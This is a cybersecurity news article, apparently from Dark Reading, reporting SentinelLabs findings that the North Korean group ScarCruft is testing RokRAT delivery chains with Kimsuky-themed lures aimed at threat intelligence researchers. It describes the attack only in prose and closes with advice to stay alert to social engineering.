Source: Cavan Images via Alamy Stock Photo
ScarCruft, the North Korea-sponsored advanced persistent threat (APT) group, is gearing up for targeted attacks on cybersecurity researchers and other members of the threat intelligence community — likely in a bid to steal nonpublic threat intel and improve its operational playbook.
According to an analysis from SentinelLabs, ScarCruft (aka APT37, Inky Squid, RedEyes, and Reaper) spent November and December targeting media organizations and think-tank personnel that focus on North Korean affairs, in a series of fairly typical impersonation-style attacks that researchers expect to continue into 2024. However, while analyzing that campaign, SentinelLabs researchers came across new, in-development malware and some trial infection chains that suggest that a different type of offensive is in the offing.
Cyberattackers Target the Threat Intelligence Community
This is not the first time that North Korean actors have targeted cybersecurity pros; but notably, the infection routine the attackers have been testing out is innovative in that it uses technical threat research on the North Korean APT known as Kimsuky as a lure.
The report is legit, published in October by Genians, a South Korean cybersecurity company — and calling out a fellow APT in such a way is a twist that appears to break new ground, according to Aleksandar Milenkoski, senior threat researcher at SentinelOne.
"To date, based on our visibility, we have not [previously] observed ScarCruft or any other suspected North Korean threat actor, using threat research materials related to another suspected threat actor in the region as decoys," he notes. "Kimsuky is another suspected North Korean threat group observed to share operational characteristics with ScarCruft, like infrastructure and command-and-control server configurations."
Based on the lure and other details spotted in the malware testing activities, "the adversary likely intends to target … cybersecurity professionals or businesses," Milenkoski explains. "We suspect ScarCruft has been planning phishing or social engineering campaigns on recent developments in the North Korean cyber-threat landscape, targeting audiences consuming threat intelligence reports."
As far as the end goal, the firm concluded that one aim is likely stealing such reports, which could reveal whether researchers are onto ScarCruft's latest tactics, techniques, and procedures (TTPs), thus "identifying potential threats to [the APT's] operations and contributing to refining their operational and evasive approaches."
A twin goal could be gaining access to cybersecurity environments to use as a launchpad for convincing impersonation attacks — i.e., "mimicking cybersecurity professionals and businesses to target specific customers and contacts directly, or more broadly through brand impersonation," according to the SentinelOne report.
Cybersecurity Researchers Beware: ScarCruft Dangles Kimsuky Lure
ScarCruft has a long history of targeted attacks against South Korean individuals, as well as public and private entities, and acts as a cyber-espionage specialist for the Democratic People's Republic of Korea (DPRK).
"ScarCruft has been observed to share operational characteristics with Kimsuky, like infrastructure and command-and-control server configurations," Milenkoski says. "Current understanding of the group indicates they are primarily conducting intelligence collection, aligned with the efforts of the Ministry of State Security (MSS) and in support of North Korean strategic interests."
To that end, in the active campaign that was originally the focus of SentinelLabs' analysis, ScarCruft repeatedly targeted the same individuals with the goal of delivering RokRAT, a custom backdoor developed by the adversaries that allows a range of surveillance types on targeted entities.
RokRAT is also at the center of the wave of cybersecurity pro targeting that’s likely coming, according to the SentinelLabs report.
"While investigating ScarCruft activities, we retrieved malware that we assess to be part of ScarCruft's planning and testing processes,” the researchers said. "This includes a spectrum of shellcode variants delivering RokRAT, public tooling, and two oversized LNK files, named inteligence.lnk and news.lnk.”
Both malicious LNK malwares execute PowerShell code when opened, which in turn extracts the decoy Kimsuky PDF document (named “inteligence.pdf”), and fetches a hex-encoded file named story.txt from the cloud. The story.txt file benignly opens notepad.exe, indicating that inteligence.lnk has been developed for testing purposes, researchers explained.
On the other hand, "the shellcode executed by news.lnk is weaponized and deploys the RokRAT backdoor," according to the analysis. "It is likely that news.lnk is the fully developed version of inteligence.lnk, intended for use in future ScarCruft campaigns."
While the approach is similar to campaigns in the wild that researchers have previously analyzed, it’s clear that the group is fine-tuning and tinkering with its approaches.
"ScarCruft's malware testing activities reveals the adversary’s commitment to innovating its arsenal and expanding its target list," according to the SentinelLabs report on ScarCruft, released today. "We observed the group experimenting with new infection chains inspired by those they have used in the past. This involves modifying malicious code implementations and excluding certain files from the infection steps, likely as a strategy to evade detection based on filesystem artifacts and the known ScarCruft techniques that have been publicly disclosed by the threat intelligence community."
Milenkoski advises cybersecurity researchers, especially those involved in examining the Korean threat landscape, to stay frosty and be on the lookout for cleverly designed, convincing email attacks going forward.
"Cybersecurity professionals are typically more aware of warning signs than the general public, so the barrier is higher," he says. “Nevertheless, the general advice of maintaining vigilance against social engineering attempts and avoiding the opening of unknown attachments or clicking on unknown links unless they are from a trusted source still applies."